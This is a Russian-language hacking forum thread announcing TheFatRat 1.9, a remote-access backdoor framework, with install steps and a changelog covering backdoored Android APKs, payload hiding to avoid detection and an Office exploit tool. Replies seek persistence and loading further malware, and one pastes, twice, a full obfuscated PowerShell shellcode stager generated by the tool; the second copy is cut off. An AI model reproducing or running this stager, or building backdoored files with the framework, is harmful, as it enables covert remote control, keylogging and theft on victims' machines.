The Fat Rat - Backdoor для удаленного доступа V.1.9

Vander

Well-Known Member
Администратор
16.01.2016
963
2 227
28
#1
Приветствую! Думаю многие из вас слышали об инструменте предназначенном для получения удаленного доступа к целевому хосту под названием The Fat Rat.
В этой статье речь пойдет об обновлении его до версии 1.9.

upload_2017-6-7_23-9-18.png

Приступим к установке, я использую обновленный дистрибутив Kali Linux 2017.1.

> git clone
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


upload_2017-6-7_23-9-32.png

> cd TheFatRat/

> bash setup.sh

upload_2017-6-7_23-9-49.png

Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:

> fatrat


upload_2017-6-7_23-10-15.png

После проверки необходимых зависимостей, смотрим и внимаем на следующее сообщение:

upload_2017-6-7_23-10-34.png

С этим, я думаю, все понятно, идем дальше жмакнув Enter:

upload_2017-6-7_23-10-46.png

Тут, нас встречает главное меню фреймворка.

Список изменений в новой версии:

· V1.9.4 - Fatrat будет иметь полноценный терминальный режим, добавлен инструмент Powerstage, скрипт установки перестроен.

· V1.9.3 - Добавлен скрипт обновления CHANGELOG.

· V1.9.3 - Dex2Jar будет теперь установлен после установки Fatrat вручную в пользовательской системе (Kali по-прежнему использует старую версию)

· V1.9.3 - Обновлены инструменты для создания Android для V.26 RC1 и платформы Android V. 25-R03.

· V1.9.3 - Обновлен dana travis backdoor-apk до 0.2.2 в fatrat / добавлен openssl в настройке.

· V1.9.2 - Msfvenom Android Rat будет подписан Android - сертификатом, поэтому он может быть установлен правильно.

· V1.9.2 - Реализован по умолчанию LHOST & LPORT config для fatrat & powerfull shell creator.

· V1.9.2 - Реализованные функции Stop в pnwinds.

· V1.9.2 - Новый процесс подписания в старом методе backdoor apk & option для создания listener’a.

· V1.9.2 - Реализована возможность для пользователя сохранять msfconsole listener’s.

· V1.9.2 - Исправления в Microsploit.

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя для powerl.sh

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя хоста перед установкой пользователя LHOST.

· V1.9.2 - Реализовано создание журнала для Microsploit и исправленных ошибок

· V1.9.2 - Добавлен эффективный способ обнаружения пользовательского дистрибутива Linux.

· V1.9.2 - Setup.sh (исправлено).

· V1.9.2 - Удалены некоторые функции и переменные.

· V1.9.1 - v1.9.1 - Реализован Microsploit (Office Exploitation Tool).

· V1.9b - реализован Backdoor-apk от Dana James Traversie в этой версии. {Меньше инструментов для установки во время setup.sh}.

· V1.9.0 - Обновлен скрипт setup.sh.

· V1.9.0 - Исправлены опечатки и ошибки.

· V1.9.0 - Backdoor APKS имеет новый метод скрытия полезной нагрузки в apk Rat, чтобы не быть обнаруженным.

· V1.9.0 - APK (5) rebuild Rat полностью изменилось (адаптированный скрипт backdoor-apk для fatrat).

· V1.9.0 - Apktool больше устанавливается с помощью setup.sh, то же самое относится к: dx, zipalign (apktool на debian repo - 2.2.1, и эта версия дает ошибку при компиляции apk-файлов, поэтому обновлены инструменты apktool и android).

· V1.9.2 - Исправлена полезная нагрузка в опции pnwinds2.

На этом, пожалуй, все. Напоследок, хочу сказать, что он (TheFatRat) стал гораздо круче, жду Ваши статьи с примерами применения этого фреймворка.

Спасибо за внимание.

upload_2017-6-7_23-11-15.png
 
Последнее редактирование:

Oksy

Active Member
Премиум
05.05.2017
37
14
26
Москва
#2
Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.

Вообще начиная знакомство с FatRat я надеялась получить радмина, похожего на тимвивер. Здесь все немножко по другому, но тоже сойдет :).

У меня был баг, но это скорее всего к метерпретеру и MSF вопросы. Файл отчетов кейлогера не создавался, хотя в консоли было указано его название и мето где он лежит. Но такой папки даже небыло:confused:
 
И еще вопрос, что это за кракозябры в .bat файле, и на каком это языке написано. А то хотелось бы научиться понимать содержимое, и писать самостоятельно подобные письмена.
powershell -w 1 -C "sv D -;sv u ec;sv dX ((gv D).value.toString()+(gv u).value.toString());powershell (gv dX).value.toString() 'JABtAHEAdABnACAAPQAgACcAJABVAHoAagBqACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAegBqAGoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBkACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgANgA0ACwAMAB4ADMANwAsADAAeABkAGIALAAwAHgAYwBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgANQBiACwAMAB4ADMAOAAsADAAeAA5ADEALAAwAHgAYwBiACwAMAB4ADQAYgAsADAAeAAzAGYALAAwAHgANQBhACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMgAwACwAMAB4AGQAMgAsADAAeABkADEALAAwAHgAYgBhACwAMAB4ADYAMAAsADAAeAA4ADAALAAwAHgAOQAyACwAMAB4AGUAYwAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4AGYANwAsADAAeAAwADAALAAwAHgAMQBhACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAOQAzACwAMAB4ADYAZQAsADAAeAAwAGYALAAwAHgAMAAzACwAMAB4ADEANAAsADAAeABjADQALAAwAHgANgA5ACwAMAB4ADIAYQAsADAAeABhADUALAAwAHgANwA1ACwAMAB4ADQAOQAsADAAeAAyAGQALAAwAHgAMgA1ACwAMAB4ADgANAAsADAAeAA5AGUALAAwAHgAOABkACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgAZAAzACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAYgBhACwAMAB4ADEAZQAsADAAeAA5AGMALAAwAHgAMABhACwAMAB4AGIAMAAsADAAeAA4AGQALAAwAHgAMwAxACwAMAB4ADMAZgAsADAAeAA4AGMALAAwAHgAMABkACwAMAB4AGIAOQAsADAAeAA3ADMALAAwAHgAMAAwACwAMAB4ADEANgAsADAAeAA1AGUALAAwAHgAYwAzACwAMAB4ADIAMwAsADAAeAAzADcALAAwAHgAZgAxACwAMAB4ADUAOAAsADAAeAA3AGEALAAwAHgAOQA3ACwAMAB4AGYAMwAsADAAeAA4AGQALAAwAHgAZgA2ACwAMAB4ADkAZQAsADAAeABlAGIALAAwAHgAZAAyACwAMAB4ADMAMwAsADAAeAA2ADgALAAwAHgAOAA3ACwAMAB4ADIAMAAsADAAeABjAGYALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAA3ADkALAAwAHgAMwAwACwAMAB4AGMANwAsADAAeABhAGMALAAwAHgAYgA2ACwAMAB4AGMAMwAsADAAeAAxADkALAAwAHgAZQA4ACwAMAB4ADcAMAAsADAAeAAzAGMALAAwAHgANgBjACwAMAB4ADAAMAAsADAAeAA4ADMALAAwAHgAYwAxACwAMAB4ADcANwAsADAAeABkADcALAAwAHgAZgBlACwAMAB4ADEAZAAsADAAeABmAGQALAAwAHgAYwBjACwAMAB4ADUAOAAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADIAOAAsADAAeAA1ADkALAAwAHgAMwBhACwAMAB4ADMAMwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGYANwAsADAAeAAzADcALAAwAHgAZQA0ACwAMAB4ADcAOQAsADAAeAAwADYALAAwAHgAOQBiACwAMAB4ADkAZQAsADAAeAA4ADUALAAwAHgAOAAzACwAMAB4ADEAYQAsADAAeAA3ADEALAAwAHgAMABjACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgANQA1ACwAMAB4ADUANQAsADAAeAA4ADMALAAwAHgAMgAxACwAMAB4AGMAYwAsADAAeAAzADMALAAwAHgANgAyACwAMAB4ADUAZAAsADAAeAAwAGUALAAwAHgAOQBjACwAMAB4AGQAYgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADMAMAAsADAAeAAwAGYALAAwAHgANwA2ACwAMAB4ADAANwAsADAAeAA1AGMALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeABiADgALAAwAHgAOQBjACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4AGEAZQAsADAAeAAzADUALAAwAHgANgA3ACwAMAB4ADQANAAsADAAeAA4ADIALAAwAHgAYgBlACwAMAB4AGEAMQAsADAAeAA5ADMALAAwAHgAZQA1ACwAMAB4ADkANAAsADAAeAAxADYALAAwAHgAMABiACwAMAB4ADEAOAAsADAAeAAxADcALAAwAHgANgA3ACwAMAB4ADAANQAsADAAeABkAGUALAAwAHgANAAzACwAMAB4ADMANwAsADAAeAAzAGQALAAwAHgAZgA3ACwAMAB4AGUAYgAsADAAeABkAGMALAAwAHgAYgBkACwAMAB4AGYAOAAsADAAeAAzADkALAAwAHgANAA4ACwAMAB4AGIAYgAsADAAeAA2AGUALAAwAHgAMAAyACwAMAB4ADIANQAsADAAeABjADMALAAwAHgAMAA3ACwAMAB4AGUAYQAsADAAeAAzADQALAAwAHgAYwA0ACwAMAB4AGMANgAsADAAeABiADYALAAwAHgAYgAxACwAMAB4ADIAMgAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAMgAsADAAeABmAGEALAAwAHgANwA4ACwAMAB4AGMANwAsADAAeAA1ADIALAAwAHgAYQBiACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgANQBkACwAMAB4ADkANAAsADAAeAAwADAALAAwAHgAMgBlACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAYQBhACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgAOQA1ACwAMAB4ADQAMgAsADAAeAA3AGIALAAwAHgAMgBiACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgAMwAzACwAMAB4ADAAZQAsADAAeAAwADYALAAwAHgAZQBiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAMAA4ACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMwBmACwAMAB4ADEANwAsADAAeAA5ADQALAAwAHgAYwA4ACwAMAB4AGIAZgAsADAAeAA4AGQALAAwAHgAMQAzACwAMAB4ADUAYgAsADAAeABlADgALAAwAHgAMwA5ACwAMAB4ADEAZQAsADAAeABiAGEALAAwAHgAZABlACwAMAB4AGUANQAsADAAeABlADEALAAwAHgAZQA5ACwAMAB4ADUANQAsADAAeAAyAGYALAAwAHgANwA0ACwAMAB4ADUAMgAsADAAeAAwADEALAAwAHgANQAwACwAMAB4ADkAOAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADAANgAsADAAeABmADIALAAwAHgANQAyACwAMAB4AGIAOQAsADAAeABmAGUALAAwAHgAYQA2ACwAMAB4ADAAMAAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADcAMwAsADAAeAAzADUALAAwAHgANABkACwAMAB4ADkANQAsADAAeAA3AGMALAAwAHgANgBjACwAMAB4ADIAMgAsADAAeAAzAGUALAAwAHgAMQA1ACwAMAB4ADkAMgAsADAAeAAxAGQALAAwAHgAMAA4ACwAMAB4AGIAYQAsADAAeAA2AGQALAAwAHgANAA4ACwAMAB4ADgAOAAsADAAeAA4ADYALAAwAHgAYgBiACwAMAB4AGIANAAsADAAeABmAGUALAAwAHgAZQA2ACwAMAB4ADcAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbAB2AEcAagA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbAB2AEcAagAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbAB2AEcAagAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AcQB0AGcAKQApADsAJABYAFIARwAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABoAGgAagBmACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgAaABqAGYAIAAkAFgAUgBHACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFgAUgBHACAAJABlACIAOwB9AA=='"
 

Ondrik8

prodigy
Red Team
08.11.2016
746
1 939
#4
Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.

Вообще начиная знакомство с FatRat я надеялась получить радмина, похожего на тимвивер. Здесь все немножко по другому, но тоже сойдет :).

У меня был баг, но это скорее всего к метерпретеру и MSF вопросы. Файл отчетов кейлогера не создавался, хотя в консоли было указано его название и мето где он лежит. Но такой папки даже небыло:confused:
 
И еще вопрос, что это за кракозябры в .bat файле, и на каком это языке написано. А то хотелось бы научиться понимать содержимое, и писать самостоятельно подобные письмена.
powershell -w 1 -C "sv D -;sv u ec;sv dX ((gv D).value.toString()+(gv u).value.toString());powershell (gv dX).value.toString() 'JABtAHEAdABnACAAPQAgACcAJABVAHoAagBqACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAegBqAGoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBkACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgANgA0ACwAMAB4ADMANwAsADAAeABkAGIALAAwAHgAYwBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgANQBiACwAMAB4ADMAOAAsADAAeAA5ADEALAAwAHgAYwBiACwAMAB4ADQAYgAsADAAeAAzAGYALAAwAHgANQBhACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMgAwACwAMAB4AGQAMgAsADAAeABkADEALAAwAHgAYgBhACwAMAB4ADYAMAAsADAAeAA4ADAALAAwAHgAOQAyACwAMAB4AGUAYwAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4AGYANwAsADAAeAAwADAALAAwAHgAMQBhACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAOQAzACwAMAB4ADYAZQAsADAAeAAwAGYALAAwAHgAMAAzACwAMAB4ADEANAAsADAAeABjADQALAAwAHgANgA5ACwAMAB4ADIAYQAsADAAeABhADUALAAwAHgANwA1ACwAMAB4ADQAOQAsADAAeAAyAGQALAAwAHgAMgA1ACwAMAB4ADgANAAsADAAeAA5AGUALAAwAHgAOABkACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgAZAAzACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAYgBhACwAMAB4ADEAZQAsADAAeAA5AGMALAAwAHgAMABhACwAMAB4AGIAMAAsADAAeAA4AGQALAAwAHgAMwAxACwAMAB4ADMAZgAsADAAeAA4AGMALAAwAHgAMABkACwAMAB4AGIAOQAsADAAeAA3ADMALAAwAHgAMAAwACwAMAB4ADEANgAsADAAeAA1AGUALAAwAHgAYwAzACwAMAB4ADIAMwAsADAAeAAzADcALAAwAHgAZgAxACwAMAB4ADUAOAAsADAAeAA3AGEALAAwAHgAOQA3ACwAMAB4AGYAMwAsADAAeAA4AGQALAAwAHgAZgA2ACwAMAB4ADkAZQAsADAAeABlAGIALAAwAHgAZAAyACwAMAB4ADMAMwAsADAAeAA2ADgALAAwAHgAOAA3ACwAMAB4ADIAMAAsADAAeABjAGYALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAA3ADkALAAwAHgAMwAwACwAMAB4AGMANwAsADAAeABhAGMALAAwAHgAYgA2ACwAMAB4AGMAMwAsADAAeAAxADkALAAwAHgAZQA4ACwAMAB4ADcAMAAsADAAeAAzAGMALAAwAHgANgBjACwAMAB4ADAAMAAsADAAeAA4ADMALAAwAHgAYwAxACwAMAB4ADcANwAsADAAeABkADcALAAwAHgAZgBlACwAMAB4ADEAZAAsADAAeABmAGQALAAwAHgAYwBjACwAMAB4ADUAOAAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADIAOAAsADAAeAA1ADkALAAwAHgAMwBhACwAMAB4ADMAMwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGYANwAsADAAeAAzADcALAAwAHgAZQA0ACwAMAB4ADcAOQAsADAAeAAwADYALAAwAHgAOQBiACwAMAB4ADkAZQAsADAAeAA4ADUALAAwAHgAOAAzACwAMAB4ADEAYQAsADAAeAA3ADEALAAwAHgAMABjACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgANQA1ACwAMAB4ADUANQAsADAAeAA4ADMALAAwAHgAMgAxACwAMAB4AGMAYwAsADAAeAAzADMALAAwAHgANgAyACwAMAB4ADUAZAAsADAAeAAwAGUALAAwAHgAOQBjACwAMAB4AGQAYgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADMAMAAsADAAeAAwAGYALAAwAHgANwA2ACwAMAB4ADAANwAsADAAeAA1AGMALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeABiADgALAAwAHgAOQBjACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4AGEAZQAsADAAeAAzADUALAAwAHgANgA3ACwAMAB4ADQANAAsADAAeAA4ADIALAAwAHgAYgBlACwAMAB4AGEAMQAsADAAeAA5ADMALAAwAHgAZQA1ACwAMAB4ADkANAAsADAAeAAxADYALAAwAHgAMABiACwAMAB4ADEAOAAsADAAeAAxADcALAAwAHgANgA3ACwAMAB4ADAANQAsADAAeABkAGUALAAwAHgANAAzACwAMAB4ADMANwAsADAAeAAzAGQALAAwAHgAZgA3ACwAMAB4AGUAYgAsADAAeABkAGMALAAwAHgAYgBkACwAMAB4AGYAOAAsADAAeAAzADkALAAwAHgANAA4ACwAMAB4AGIAYgAsADAAeAA2AGUALAAwAHgAMAAyACwAMAB4ADIANQAsADAAeABjADMALAAwAHgAMAA3ACwAMAB4AGUAYQAsADAAeAAzADQALAAwAHgAYwA0ACwAMAB4AGMANgAsADAAeABiADYALAAwAHgAYgAxACwAMAB4ADIAMgAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAMgAsADAAeABmAGEALAAwAHgANwA4ACwAMAB4AGMANwAsADAAeAA1ADIALAAwAHgAYQBiACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgANQBkACwAMAB4ADkANAAsADAAeAAwADAALAAwAHgAMgBlACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAYQBhACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgAOQA1ACwAMAB4ADQAMgAsADAAeAA3AGIALAAwAHgAMgBiACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgAMwAzACwAMAB4ADAAZQAsADAAeAAwADYALAAwAHgAZQBiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAMAA4ACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMwBmACwAMAB4ADEANwAsADAAeAA5ADQALAAwAHgAYwA4ACwAMAB4AGIAZgAsADAAeAA4AGQALAAwAHgAMQAzACwAMAB4ADUAYgAsADAAeABlADgALAAwAHgAMwA5ACwAMAB4ADEAZQAsADAAeABiAGEALAAwAHgAZABlACwAMAB4AGUANQAsADAAeABlADEALAAwAHgAZQA5ACwAMAB4ADUANQAsADAAeAAyAGYALAAwAHgANwA0ACwAMAB4ADUAMgAsADAAeAAwADEALAAwAHgANQAwACwAMAB4ADkAOAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADAANgAsADAAeABmADIALAAwAHgANQAyACwAMAB4AGIAOQAsADAAeABmAGUALAAwAHgAYQA2ACwAMAB4ADAAMAAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADcAMwAsADAAeAAzADUALAAwAHgANABkACwAMAB4ADkANQAsADAAeAA3AGMALAAwAHgANgBjACwAMAB4ADIAMgAsADAAeAAzAGUALAAwAHgAMQA1ACwAMAB4ADkAMgAsADAAeAAxAGQALAAwAHgAMAA4ACwAMAB4AGIAYQAsADAAeAA2AGQALAAwAHgANAA4ACwAMAB4ADgAOAAsADAAeAA4ADYALAAwAHgAYgBiACwAMAB4AGIANAAsADAAeABmAGUALAAwAHgAZQA2ACwAMAB4ADcAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbAB2AEcAagA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbAB2AEcAagAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbAB2AEcAagAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AcQB0AGcAKQApADsAJABYAFIARwAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABoAGgAagBmACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGk